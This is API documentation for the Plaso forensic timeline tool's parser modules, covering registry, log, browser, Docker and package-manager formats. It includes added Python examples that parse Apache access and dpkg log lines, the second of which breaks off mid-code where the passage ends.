plaso.parsers.winreg_plugins.winlogon module

This file contains the Winlogon Registry plugin.

class plaso.parsers.winreg_plugins.winlogon.WinlogonEventData
    Bases: plaso.containers.events.EventData

    Winlogon event data attribute container.

    application
        Winlogon application.
        Type str
    command
        Winlogon command.
        Type str
    handler
        Winlogon handler.
        Type str
    key_path
        Windows Registry key path.
        Type str
    trigger
        Winlogon trigger.
        Type str

    DATA_TYPE = 'windows:registry:winlogon'

class plaso.parsers.winreg_plugins.winlogon.WinlogonPlugin
    Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin

    Windows Registry plugin for parsing the Winlogon key.

    DATA_FORMAT = 'Windows log-on Registry data'

    ExtractEvents(parser_mediator, registry_key, **kwargs)
        Extracts events from a Windows Registry key.
        Parameters
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.

    FILTERS = frozenset({})
    NAME = 'winlogon'

plaso.parsers.winreg_plugins.winrar module

This file contains a WinRAR history Windows Registry plugin.

class plaso.parsers.winreg_plugins.winrar.WinRARHistoryEventData
    Bases: plaso.containers.events.EventData

    WinRAR history event data attribute container.

    entries
        archive history entries.
        Type str
    key_path
        Windows Registry key path.
        Type str

    DATA_TYPE = 'winrar:history'

class plaso.parsers.winreg_plugins.winrar.WinRARHistoryPlugin
    Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin

    Windows Registry plugin for parsing WinRAR History keys.

    DATA_FORMAT = 'WinRAR History Registry data'

    ExtractEvents(parser_mediator, registry_key, **kwargs)
        Extracts events from a Windows Registry key.
        Parameters
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.

    FILTERS = frozenset({, , })
    NAME = 'winrar_mru'

Module contents

Imports for the Windows Registry parser.

Submodules

plaso.parsers.android_app_usage module

Parser for the Android usage history (usage-history.xml) files.

class plaso.parsers.android_app_usage.AndroidAppUsageEventData
    Bases: plaso.containers.events.EventData

    Android application usage event data.

    package
        name of the Android application.
        Type str
    component
        name of the individual component of the application.
        Type str

    DATA_TYPE = 'android:event:last_resume_time'

class plaso.parsers.android_app_usage.AndroidAppUsageParser
    Bases: plaso.parsers.interface.FileObjectParser

    Parses the Android usage history (usage-history.xml) file.

    DATA_FORMAT = 'Android usage history (usage-history.xml) file'
    NAME = 'android_app_usage'

    ParseFileObject(parser_mediator, file_object)
        Parses an Android usage-history file-like object.
        Parameters
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • file_object (dfvfs.FileIO) – file-like object.
        Raises
            UnableToParseFile – when the file cannot be parsed.

plaso.parsers.apache_access module

Apache access log (access.log) file parser.

Parser based on the two default Apache formats, common and combined log format, defined in https://httpd.apache.org/docs/2.4/logs.html

class plaso.parsers.apache_access.ApacheAccessEventData
    Bases: plaso.containers.events.EventData

    Apache access event data.

    http_request_referer
        http request referer header information.
        Type str
    http_request
        first line of http request.
        Type str
    http_request_user_agent
        http request user agent header information.
        Type str
    http_response_bytes
        http response bytes size without headers.
        Type int
    http_response_code
        http response code from server.
        Type int
    ip_address
        IPv4 or IPv6 addresses.
        Type str
    port_number
        canonical port of the server serving the request.
        Type int
    remote_name
        remote logname (from identd, if supplied).
        Type str
    server_name
        canonical hostname of the server serving the request.
        Type str
    user_name
        logged user name.
        Type str

    DATA_TYPE = 'apache:access'

class plaso.parsers.apache_access.ApacheAccessParser
    Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser

    Apache access log (access.log) file parser.

    DATA_FORMAT = 'Apache access log (access.log) file'

    LINE_STRUCTURES = [('combined_log_format', {{{{{{{{{{IPv4 address | IPv6 address} {W:(ABCD...) | "-"}} {W:(ABCD...) | "-"}} Group:({{{{{{{{{{{{{Suppress:("[") W:(0123...)} Suppress:("/")} W:(ABCD...)} Suppress:("/")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Combine:({- | + W:(0123...)})} Suppress:("]")})} {{Suppress:(""") SkipTo:("" ")} Suppress:(""")}} W:(0123...)} {"-" | W:(0123...)}} {{Suppress:(""") SkipTo:("" ")} Suppress:(""")}} {{Suppress:(""") SkipTo:(""")} Suppress:(""")}} lineEnd}), ('common_log_format', {{{{{{{{IPv4 address | IPv6 address} {W:(ABCD...) | "-"}} {W:(ABCD...) | "-"}} Group:({{{{{{{{{{{{{Suppress:("[") W:(0123...)} Suppress:("/")} W:(ABCD...)} Suppress:("/")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Combine:({- | + W:(0123...)})} Suppress:("]")})} {{Suppress:(""") SkipTo:("" ")} Suppress:(""")}} W:(0123...)} {"-" | W:(0123...)}} lineEnd}), ('vhost_combined_log_format', {{{{{{{{{{{{W:(ABCD...) Suppress:(":")} W:(0123...)} {IPv4 address | IPv6 address}} {W:(ABCD...) | "-"}} {W:(ABCD...) | "-"}} Group:({{{{{{{{{{{{{Suppress:("[") W:(0123...)} Suppress:("/")} W:(ABCD...)} Suppress:("/")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Combine:({- | + W:(0123...)})} Suppress:("]")})} {{Suppress:(""") SkipTo:("" ")} Suppress:(""")}} W:(0123...)} {"-" | W:(0123...)}} {{Suppress:(""") SkipTo:("" ")} Suppress:(""")}} {{Suppress:(""") SkipTo:(""")} Suppress:(""")}} lineEnd})]

    MAX_LINE_LENGTH = 2048
    NAME = 'apache_access'

    ParseRecord(parser_mediator, key, structure)
        Parses a matching entry.
        Parameters
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • key (str) – name of the parsed structure.
            • structure (pyparsing.ParseResults) – elements parsed from the file.
        Raises
            ParseError – when the structure type is unknown.

    VerifyStructure(parser_mediator, line)
        Verifies that this is an Apache access log file.
        Parameters
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • line (str) – line from the text file.
        Returns
            True if this is the correct parser, False otherwise.
        Return type
            bool
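The three log formats that ApacheAccessParser recognises (common, combined and vhost_combined) map onto the ApacheAccessEventData fields listed above. The following is an added example, not Plaso's own code: it uses plain regular expressions rather than pyparsing, and the sample log lines, the function names and the choice to record a "-" byte count as 0 are this example's assumptions.

```python
"""Added example (not Plaso code): parse Apache access log lines in the
common, combined and vhost_combined formats into the ApacheAccessEventData
field names documented for plaso.parsers.apache_access."""
import re
from datetime import datetime, timedelta, timezone

# Common log format: host, identd logname, user, [timestamp], "request",
# status, response bytes.  Field names follow ApacheAccessEventData.
_COMMON = (
    r'(?P<ip_address>\S+) (?P<remote_name>\S+) (?P<user_name>\S+) '
    r'\[(?P<timestamp>[^\]]+)\] "(?P<http_request>[^"]*)" '
    r'(?P<http_response_code>\d{3}) (?P<http_response_bytes>\d+|-)'
)
# Combined format appends the Referer and User-Agent request headers.
_COMBINED = (
    _COMMON + r' "(?P<http_request_referer>[^"]*)"'
    r' "(?P<http_request_user_agent>[^"]*)"'
)
# vhost_combined prefixes the canonical server name and port.
_VHOST_COMBINED = r'(?P<server_name>\S+):(?P<port_number>\d+) ' + _COMBINED

# Most specific format first, so a vhost line is not misread as combined.
_FORMATS = [
    ('vhost_combined_log_format', re.compile('^' + _VHOST_COMBINED + '$')),
    ('combined_log_format', re.compile('^' + _COMBINED + '$')),
    ('common_log_format', re.compile('^' + _COMMON + '$')),
]

_MONTHS = {name: number for number, name in enumerate(
    ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun',
     'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec'], 1)}

_TIMESTAMP_RE = re.compile(
    r'(\d{2})/(\w{3})/(\d{4}):(\d{2}):(\d{2}):(\d{2}) ([+-])(\d{2})(\d{2})$')


def parse_apache_timestamp(value):
    """Converts '10/Oct/2000:13:55:36 -0700' to an aware datetime in UTC."""
    match = _TIMESTAMP_RE.match(value)
    if not match:
        raise ValueError('unsupported Apache timestamp: {!r}'.format(value))
    day, month, year, hour, minute, second, sign, off_h, off_m = match.groups()
    offset = timedelta(hours=int(off_h), minutes=int(off_m))
    if sign == '-':
        offset = -offset
    local = datetime(int(year), _MONTHS[month], int(day), int(hour),
                     int(minute), int(second), tzinfo=timezone(offset))
    return local.astimezone(timezone.utc)


def parse_apache_access_line(line):
    """Returns (format_name, fields) for a recognised line, else None."""
    line = line.rstrip('\r\n')
    for format_name, regex in _FORMATS:
        match = regex.match(line)
        if match:
            break
    else:
        return None
    fields = match.groupdict()
    fields['http_response_code'] = int(fields['http_response_code'])
    # Apache writes "-" when no body bytes were sent; recorded as 0 here
    # (this example's choice, not necessarily what Plaso stores).
    raw_bytes = fields['http_response_bytes']
    fields['http_response_bytes'] = 0 if raw_bytes == '-' else int(raw_bytes)
    if 'port_number' in fields:
        fields['port_number'] = int(fields['port_number'])
    fields['timestamp'] = parse_apache_timestamp(fields['timestamp'])
    return format_name, fields


# Constructed sample lines (not taken from any real server).
SAMPLE_COMBINED = (
    '203.0.113.7 - frank [10/Oct/2000:13:55:36 -0700] '
    '"GET /apache_pb.gif HTTP/1.0" 200 2326 '
    '"http://www.example.com/start.html" "Mozilla/4.08 [en] (Win98; I ;Nav)"')
SAMPLE_COMMON = (
    '203.0.113.7 - - [10/Oct/2000:13:55:36 -0700] '
    '"GET /index.html HTTP/1.0" 304 -')
SAMPLE_VHOST = (
    'www.example.com:443 203.0.113.7 - - [10/Oct/2000:13:55:36 -0700] '
    '"POST /login HTTP/1.1" 302 0 "-" "curl/7.68.0"')

if __name__ == '__main__':
    for sample in (SAMPLE_COMBINED, SAMPLE_COMMON, SAMPLE_VHOST):
        print(parse_apache_access_line(sample))
```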

plaso.parsers.apt_history module

Parser for Advanced Packaging Tool (APT) History log files.

class plaso.parsers.apt_history.APTHistoryLogEventData
    Bases: plaso.containers.events.EventData

    APT History log event data.

    command
        command executed.
        Type str
    error
        reported error.
        Type str
    packages
        list of packages being affected.
        Type str
    requester
        user requesting the activity.
        Type str

    DATA_TYPE = 'apt:history:line'

class plaso.parsers.apt_history.APTHistoryLogParser
    Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser

    Parses for Advanced Packaging Tool (APT) History log files.

    DATA_FORMAT = 'Advanced Packaging Tool (APT) History log file'

    LINE_STRUCTURES = [('record_start', {{{[lineEnd]... "Start-Date:"} Group:({{{{{{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)})} lineEnd}), ('record_body', {{"Commandline:" | "Downgrade:" | "Error:" | "Install:" | "Purge:" | "Remove:" | "Requested-By:" | "Upgrade:"} rest of line}), ('record_end', {{"End-Date:" Group:({{{{{{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)})} {lineEnd}...})]

    MAX_LINE_LENGTH = 65536
    NAME = 'apt_history'

    ParseRecord(parser_mediator, key, structure)
        Parses a log record structure and produces events.
        Parameters
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • key (str) – identifier of the structure of tokens.
            • structure (pyparsing.ParseResults) – structure of tokens derived from a log entry.
        Raises
            ParseError – when the structure type is unknown.

    VerifyStructure(parser_mediator, line)
        Verify that this file is an APT History log file.
        Parameters
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • line (str) – single line from the text file.
        Returns
            True if this is the correct parser, False otherwise.
        Return type
            bool

plaso.parsers.asl module

The Apple System Log (ASL) file parser.

class plaso.parsers.asl.ASLEventData
    Bases: plaso.containers.events.EventData

    Apple System Log (ASL) event data.

    computer_name
        name of the host.
        Type str
    extra_information
        extra fields associated to the event.
        Type str
    facility
        facility.
        Type str
    group_id
        group identifier (GID).
        Type int
    level
        level of criticality of the event.
        Type str
    message_id
        message identifier.
        Type int
    message
        message of the event.
        Type str
    pid
        process identifier (PID).
        Type int
    read_uid
        user identifier that can read this file, where -1 represents all.
        Type int
    read_gid
        the group identifier that can read this file, where -1 represents all.
        Type int
    record_position
        position of the event record.
        Type int
    sender
        sender or process that created the event.
        Type str
    user_sid
        user identifier (UID).
        Type str

    DATA_TYPE = 'mac:asl:event'

class plaso.parsers.asl.ASLFileEventData
    Bases: plaso.containers.events.EventData

    Apple System Log (ASL) file event data.

    format_version
        ASL file format version.
        Type int
    is_dirty
        True if the last log entry offset does not match value in file header and the file is considered dirty.
        Type bool

    DATA_TYPE = 'mac:asl:file'

class plaso.parsers.asl.ASLParser
    Bases: plaso.parsers.interface.FileObjectParser, plaso.lib.dtfabric_helper.DtFabricHelper

    Parser for Apple System Log (ASL) files.

    DATA_FORMAT = 'Apple System Log (ASL) file'

    classmethod GetFormatSpecification()
        Retrieves the format specification.
        Returns
            format specification.
        Return type
            FormatSpecification

    NAME = 'asl_log'

    ParseFileObject(parser_mediator, file_object)
        Parses an ASL file-like object.
        Parameters
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • file_object (dfvfs.FileIO) – file-like object.
        Raises
            UnableToParseFile – when the file cannot be parsed.

plaso.parsers.bash_history module

Parser for bash history files.

class plaso.parsers.bash_history.BashHistoryEventData
    Bases: plaso.containers.events.EventData

    Bash history log event data.

    command
        command that was executed.
        Type str

    DATA_TYPE = 'bash:history:command'

class plaso.parsers.bash_history.BashHistoryParser
    Bases: plaso.parsers.text_parser.PyparsingMultiLineTextParser

    Parses events from Bash history files.

    DATA_FORMAT = 'Bash history file'

    LINE_STRUCTURES = [('log_entry', {{{Suppress:("#") W:(0123...)} Re:('.*?(?=($|\\n#\\d{10}))')} lineEnd})]

    NAME = 'bash_history'

    ParseRecord(parser_mediator, key, structure)
        Parses a record and produces a Bash history event.
        Parameters
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • key (str) – name of the parsed structure.
            • structure (pyparsing.ParseResults) – elements parsed from the file.
        Raises
            ParseError – when the structure type is unknown.

    VerifyStructure(parser_mediator, lines)
        Verifies that this is a bash history file.
        Parameters
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • lines (str) – one or more lines from the text file.
        Returns
            True if this is the correct parser, False otherwise.
        Return type
            bool

plaso.parsers.bencode_parser module

Parser for bencoded files.

class plaso.parsers.bencode_parser.BencodeFile
    Bases: object

    Bencode file.

    decoded_values
        decoded values.
        Type collections.OrderedDict[bytes|str, object]

    Close()
        Closes the file.

    GetDecodedValue(name)
        Retrieves a decoded value.
        Parameters
            name (str) – name of the value.
        Returns
            decoded value or None if not available.
        Return type
            object

    GetDecodedValues()
        Retrieves the decoded values.
        Yields
            tuple[str, object] – name and decoded value.

    Open(file_object)
        Opens a bencode file.
        Parameters
            file_object (dfvfs.FileIO) – file-like object.
        Raises
            • IOError – if the file-like object cannot be read.
            • OSError – if the file-like object cannot be read.
            • ValueError – if the file-like object is missing.

    property keys
        names of all the keys.
        Type set[str]

class plaso.parsers.bencode_parser.BencodeParser
    Bases: plaso.parsers.interface.FileObjectParser

    Parser for bencoded files.

    DATA_FORMAT = 'Bencoded file'
    NAME = 'bencode'

    ParseFileObject(parser_mediator, file_object)
        Parses a bencoded file-like object.
        Parameters
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • file_object (dfvfs.FileIO) – a file-like object.
        Raises
            UnableToParseFile – when the file cannot be parsed.

class plaso.parsers.bencode_parser.BencodeValues(decoded_values)
    Bases: object

    Bencode values.

    GetDecodedValue(name)
        Retrieves a decoded value.
        Parameters
            name (str) – name of the value.
        Returns
            decoded value or None if not available.
        Return type
            object

plaso.parsers.bsm module

Basic Security Module (BSM) event auditing file parser.

class plaso.parsers.bsm.BSMEventData
    Bases: plaso.containers.events.EventData

    Basic Security Module (BSM) audit event data.

    event_type
        identifier that represents the type of the event.
        Type int
    extra_tokens
        event extra tokens, which is a list of dictionaries that contain: {token type: {token values}}
        Type list[dict[str, dict[str, str]]]
    offset
        offset of the BSM record relative to the start of the file, from which the event data was extracted.
        Type int
    record_length
        record length in bytes (trailer number).
        Type int
    return_value
        processed return value and exit status.
        Type str

    DATA_TYPE = 'bsm:event'

class plaso.parsers.bsm.BSMParser
    Bases: plaso.parsers.interface.FileObjectParser, plaso.lib.dtfabric_helper.DtFabricHelper

    Parser for Basic Security Module (BSM) event auditing files.

    DATA_FORMAT = 'Basic Security Module (BSM) event auditing file'
    NAME = 'bsm_log'

    ParseFileObject(parser_mediator, file_object)
        Parses a BSM file-like object.
        Parameters
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • file_object (dfvfs.FileIO) – a file-like object.
        Raises
            UnableToParseFile – when the file cannot be parsed.

plaso.parsers.chrome_cache module

Parser for Google Chrome and Chromium Cache files.

class plaso.parsers.chrome_cache.CacheAddress(cache_address)
    Bases: object

    Chrome cache address.

    block_number
        block data file number.
        Type int
    block_offset
        offset within the block data file.
        Type int
    block_size
        block size.
        Type int
    filename
        name of the block data file.
        Type str
    value
        cache address.
        Type int

    FILE_TYPE_BLOCK_1024 = 3
    FILE_TYPE_BLOCK_256 = 2
    FILE_TYPE_BLOCK_4096 = 4
    FILE_TYPE_BLOCK_RANKINGS = 1
    FILE_TYPE_SEPARATE = 0

class plaso.parsers.chrome_cache.CacheEntry
    Bases: object

    Chrome cache entry.

    creation_time
        creation time, in number of microseconds since January 1, 1601, 00:00:00 UTC.
        Type int
    hash
        super fast hash of the key.
        Type int
    key
        key.
        Type bytes
    next
        cache address of the next cache entry.
        Type int
    original_url
        original URL derived from the key.
        Type str
    rankings_node
        cache address of the rankings node.
        Type int

class plaso.parsers.chrome_cache.ChromeCacheDataBlockFileParser
    Bases: plaso.parsers.interface.FileObjectParser, plaso.lib.dtfabric_helper.DtFabricHelper

    Chrome cache data block file parser.

    ParseCacheEntry(file_object, block_offset)
        Parses a cache entry.
        Parameters
            • file_object (dfvfs.FileIO) – a file-like object to read from.
            • block_offset (int) – block offset of the cache entry.
        Returns
            cache entry.
        Return type
            CacheEntry
        Raises
            ParseError – if the cache entry cannot be read.

    ParseFileObject(parser_mediator, file_object)
        Parses a file-like object.
        Parameters
            • parser_mediator (ParserMediator) – a parser mediator.
            • file_object (dfvfs.FileIO) – a file-like object to parse.
        Raises
            ParseError – when the file cannot be parsed.

class plaso.parsers.chrome_cache.ChromeCacheEntryEventData
    Bases: plaso.containers.events.EventData

    Chrome Cache event data.

    original_url
        original URL.
        Type str

    DATA_TYPE = 'chrome:cache:entry'

class plaso.parsers.chrome_cache.ChromeCacheIndexFileParser
    Bases: plaso.parsers.interface.FileObjectParser, plaso.lib.dtfabric_helper.DtFabricHelper

    Chrome cache index file parser.

    creation_time
        creation time, in number of microseconds since January 1, 1601, 00:00:00 UTC.
        Type int
    index_table
        the cache addresses which are stored in the index file.
        Type list[CacheAddress]

    ParseFileObject(parser_mediator, file_object)
        Parses a file-like object.
        Parameters
            • parser_mediator (ParserMediator) – a parser mediator.
            • file_object (dfvfs.FileIO) – a file-like object to parse.
        Raises
            ParseError – when the file cannot be parsed.

class plaso.parsers.chrome_cache.ChromeCacheParser
    Bases: plaso.parsers.interface.FileEntryParser

    Parses Chrome Cache files.

    DATA_FORMAT = 'Google Chrome or Chromium Cache file'
    NAME = 'chrome_cache'

    ParseFileEntry(parser_mediator, file_entry)
        Parses Chrome Cache files.
        Parameters
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • file_entry (dfvfs.FileEntry) – file entry.
        Raises
            UnableToParseFile – when the file cannot be parsed.

plaso.parsers.chrome_preferences module

A parser for the Chrome preferences file.

class plaso.parsers.chrome_preferences.ChromeContentSettingsExceptionsEventData
    Bases: plaso.containers.events.EventData

    Chrome content settings exceptions event data.

    permission
        permission.
        Type str
    primary_url
        primary URL.
        Type str
    secondary_url
        secondary URL.
        Type str

    DATA_TYPE = 'chrome:preferences:content_settings:exceptions'

class plaso.parsers.chrome_preferences.ChromeExtensionInstallationEventData
    Bases: plaso.containers.events.EventData

    Chrome Extension event data.

    extension_id
        extension identifier.
        Type str
    extension_name
        extension name.
        Type str
    path
        path.
        Type str

    DATA_TYPE = 'chrome:preferences:extension_installation'

class plaso.parsers.chrome_preferences.ChromeExtensionsAutoupdaterEventData
    Bases: plaso.containers.events.EventData

    Chrome Extension Autoupdater event data.

    message
        message.
        Type str

    DATA_TYPE = 'chrome:preferences:extensions_autoupdater'

class plaso.parsers.chrome_preferences.ChromePreferencesClearHistoryEventData
    Bases: plaso.containers.events.EventData

    Chrome history clearing event data.

    message
        message.
        Type str

    DATA_TYPE = 'chrome:preferences:clear_history'

class plaso.parsers.chrome_preferences.ChromePreferencesParser
    Bases: plaso.parsers.interface.FileObjectParser

    Parses Chrome Preferences files.

    DATA_FORMAT = 'Google Chrome Preferences file'
    NAME = 'chrome_preferences'

    ParseFileObject(parser_mediator, file_object)
        Parses a Chrome preferences file-like object.
        Parameters
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • file_object (dfvfs.FileIO) – file-like object.
        Raises
            UnableToParseFile – when the file cannot be parsed.

    REQUIRED_KEYS = frozenset({'browser', 'extensions'})

plaso.parsers.cups_ipp module

The CUPS IPP files parser.

CUPS IPP version 1.0:
    * https://tools.ietf.org/html/rfc2565
    * https://tools.ietf.org/html/rfc2566
    * https://tools.ietf.org/html/rfc2567
    * https://tools.ietf.org/html/rfc2568
    * https://tools.ietf.org/html/rfc2569
    * https://tools.ietf.org/html/rfc2639

CUPS IPP version 1.1:
    * https://tools.ietf.org/html/rfc2910
    * https://tools.ietf.org/html/rfc2911
    * https://tools.ietf.org/html/rfc3196
    * https://tools.ietf.org/html/rfc3510

CUPS IPP version 2.0:
    * N/A

class plaso.parsers.cups_ipp.CupsIppEventData
    Bases: plaso.containers.events.EventData

    CUPS IPP event data.

    application
        application that prints the document.
        Type str
    computer_name
        name of the computer.
        Type str
    copies
        number of copies.
        Type int
    doc_type
        type of document.
        Type str
    job_id
        job identifier.
        Type str
    job_name
        job name.
        Type str
    owner
        real name of the user.
        Type str
    printer_id
        identification name of the printer.
        Type str
    uri
        URL of the CUPS service.
        Type str
    user
        system user name.
        Type str

    DATA_TYPE = 'cups:ipp:event'

class plaso.parsers.cups_ipp.CupsIppParser
    Bases: plaso.parsers.interface.FileObjectParser, plaso.lib.dtfabric_helper.DtFabricHelper

    Parser for CUPS IPP files.

    DATA_FORMAT = 'CUPS IPP file'
    NAME = 'cups_ipp'

    ParseFileObject(parser_mediator, file_object)
        Parses a CUPS IPP file-like object.
        Parameters
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • file_object (dfvfs.FileIO) – file-like object.
        Raises
            UnableToParseFile – when the file cannot be parsed.

plaso.parsers.custom_destinations module

Parser for custom destinations jump list (.customDestinations-ms) files.

class plaso.parsers.custom_destinations.CustomDestinationsParser
    Bases: plaso.parsers.interface.FileObjectParser, plaso.lib.dtfabric_helper.DtFabricHelper

    Parses custom destinations jump list (.customDestinations-ms) files.

    DATA_FORMAT = 'Custom destinations jump list (.customDestinations-ms) file'

    classmethod GetFormatSpecification()
        Retrieves the format specification.
        Returns
            format specification.
        Return type
            FormatSpecification

    NAME = 'custom_destinations'

    ParseFileObject(parser_mediator, file_object)
        Parses a .customDestinations-ms file-like object.
        Parameters
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • file_object (dfvfs.FileIO) – a file-like object.
        Raises
            UnableToParseFile – when the file cannot be parsed.


plaso.parsers.czip module

This file contains a parser for compound ZIP files.

class plaso.parsers.czip.CompoundZIPParser
    Bases: plaso.parsers.interface.FileObjectParser

    Shared functionality for parsing compound ZIP files.

    Compound ZIP files are ZIP files used as containers to create another file format, as opposed to archives of unrelated files.

    DATA_FORMAT = 'Compound ZIP file'
    NAME = 'czip'

    ParseFileObject(parser_mediator, file_object)
        Parses a compound ZIP file-like object.
        Parameters
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • file_object (dfvfs.FileIO) – a file-like object.
        Raises
            UnableToParseFile – when the file cannot be parsed.

plaso.parsers.docker module

Parser for Docker configuration and log files.

class plaso.parsers.docker.DockerJSONContainerEventData
    Bases: plaso.containers.events.EventData

    Docker container configuration event data.

    action
        whether the container was created, started, or finished.
        Type str
    container_id
        identifier of the container (SHA256).
        Type str
    container_name
        name of the container.
        Type str

    DATA_TYPE = 'docker:json:container'

class plaso.parsers.docker.DockerJSONContainerLogEventData
    Bases: plaso.containers.events.EventData

    Docker container's log event data.

    container_id
        identifier of the container (sha256).
        Type str
    log_line
        log line.
        Type str
    log_source
        log source.
        Type str

    DATA_TYPE = 'docker:json:container:log'

class plaso.parsers.docker.DockerJSONLayerEventData
    Bases: plaso.containers.events.EventData

    Docker file system layer configuration event data.

    command
        the command used which made Docker create a new layer.
    layer_id
        the identifier of the current Docker layer (SHA-1).

    DATA_TYPE = 'docker:json:layer'

class plaso.parsers.docker.DockerJSONParser
    Bases: plaso.parsers.interface.FileObjectParser

    Parser for Docker json configuration and log files.

    This handles:
        • Per container config file DOCKER_DIR/containers//config.json
        • Per container stdout/stderr output log DOCKER_DIR/containers//-json.log
        • Filesystem layer config files DOCKER_DIR/graph//json

    DATA_FORMAT = 'Docker configuration and log JSON file'
    NAME = 'dockerjson'

    ParseFileObject(parser_mediator, file_object)
        Parses various Docker configuration and log files in JSON format.

        This method checks whether the file_object points to a docker JSON config or log file, and calls the corresponding _Parse* function to generate Events.
        Parameters
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • file_object (dfvfs.FileIO) – a file-like object.
        Raises
            • UnableToParseFile – when the file cannot be parsed.
            • ValueError – if the JSON file cannot be decoded.

plaso.parsers.dpkg module

Parser for Debian package manager log (dpkg.log) files.

Information updated 02 September 2016.

An example:

    2016-08-03 15:25:53 install base-passwd:amd64 3.5.33

Log messages are of the form:

    YYYY-MM-DD HH:MM:SS startup type command
        Where type is:
            archives (with a command of unpack or install)
            packages (with a command of configure, triggers-only, remove or purge)

    YYYY-MM-DD HH:MM:SS status state pkg installed-version

    YYYY-MM-DD HH:MM:SS action pkg installed-version available-version
        Where action is: install, upgrade, configure, trigproc, disappear, remove or purge.

    YYYY-MM-DD HH:MM:SS conffile filename decision
        Where decision is install or keep.

class plaso.parsers.dpkg.DpkgEventData
    Bases: plaso.containers.events.EventData

    Dpkg event data.

    body
        body of the log line.
        Type str

    DATA_TYPE = 'dpkg:line'

class plaso.parsers.dpkg.DpkgParser
    Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser

    Parser for Debian package manager log (dpkg.log) files.

    DATA_FORMAT = 'Debian package manager log (dpkg.log) file'

    LINE_STRUCTURES = [('line', {Group:({{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) {Combine:({{"startup" archives | packages} unpack | install | configure | triggers-only | remove | purge}) | Combine:({{{"status" W:(0123...)} W:(0123...)} W:(0123...)}) | Combine:({{{install | upgrade | configure | trigproc | disappear | remove | purge W:(0123...)} W:(0123...)} W:(0123...)}) | Combine:({{"conffile" W:(0123...)} install | keep})}})]

    NAME = 'dpkg'

    ParseRecord(parser_mediator, key, structure)
        Parses a structure of tokens derived from a line of a text file.
        Parameters
            • parser_mediator (ParserMediator) – parser mediator.
            • key (str) – identifier of the structure of tokens.
            • structure (pyparsing.ParseResults) – structure of tokens derived from a line of a text file.
        Raises
            ParseError – when the structure type is unknown.
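The four dpkg.log line forms described above (startup, status, action and conffile) can be recognised with one pattern per form, which is what DpkgParser's LINE_STRUCTURES does with pyparsing. The following is an added example, not Plaso's own code: it uses regular expressions, keeps the text after the timestamp as the body (the value DpkgEventData.body is documented to carry), and skips lines that match no form; the sample log and all function and class names are this example's own.

```python
"""Added example (not Plaso code): a small parser for the dpkg.log line
forms documented for plaso.parsers.dpkg."""
import re
from datetime import datetime
from typing import Dict, Iterator, NamedTuple, Optional

_TIMESTAMP = r'(?P<timestamp>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})'
_STARTUP_TYPES = r'archives|packages'
_STARTUP_COMMANDS = r'unpack|install|configure|triggers-only|remove|purge'
_ACTIONS = r'install|upgrade|configure|trigproc|disappear|remove|purge'

# One pattern per documented line form; each is anchored to the whole line
# so a partially matching line is rejected rather than half-parsed.
_LINE_FORMS = {
    'startup': re.compile(
        _TIMESTAMP + r' startup (?P<type>' + _STARTUP_TYPES + r')'
        r' (?P<command>' + _STARTUP_COMMANDS + r')$'),
    'status': re.compile(
        _TIMESTAMP + r' status (?P<state>\S+) (?P<package>\S+)'
        r' (?P<installed_version>\S+)$'),
    'action': re.compile(
        _TIMESTAMP + r' (?P<action>' + _ACTIONS + r') (?P<package>\S+)'
        r' (?P<installed_version>\S+) (?P<available_version>\S+)$'),
    'conffile': re.compile(
        _TIMESTAMP + r' conffile (?P<filename>\S+)'
        r' (?P<decision>install|keep)$'),
}

# Length of "YYYY-MM-DD HH:MM:SS " that precedes the body of every line.
_BODY_OFFSET = 20


class DpkgEvent(NamedTuple):
    timestamp: datetime
    kind: str                # startup, status, action or conffile
    body: str                # the line after the timestamp (DpkgEventData.body)
    fields: Dict[str, str]   # the named parts of that form


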